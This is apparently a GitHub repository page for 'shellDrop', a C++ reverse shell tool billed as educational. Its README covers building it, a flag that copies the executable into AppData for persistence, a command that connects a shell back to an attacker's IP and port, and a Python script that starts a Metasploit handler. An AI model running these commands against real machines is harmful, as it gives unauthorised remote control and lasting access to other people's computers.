Skip to content

mendax0110/shellDrop

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

shellDrop

ShellDrop is an educational reverse shell project written in C++ for learning purposes only. It is glued together with a bunch of python and bash scripts for the metasploit stuff and the packing into a zip file.

Build process

The build process is quite simple. Just run the following command in the root directory of the project:

mkdir build
cd build
cmake ..
cmake --build .

Usage (target machine)

Just run the following command in the build directory of the project:

cd build
  • To enable Persistance only (copy the exe into a the AppData folder)
./shellDrop -ep
  • To start the reverse shell
./shellDrop -ip <IP> -p <PORT>

Usage (attacker machine)

Just run the following command in the root directory of the project:

cd utils
  • To start the listener and metasploit handler
python set_metasploit_handler.py <Local IP> <Local Port>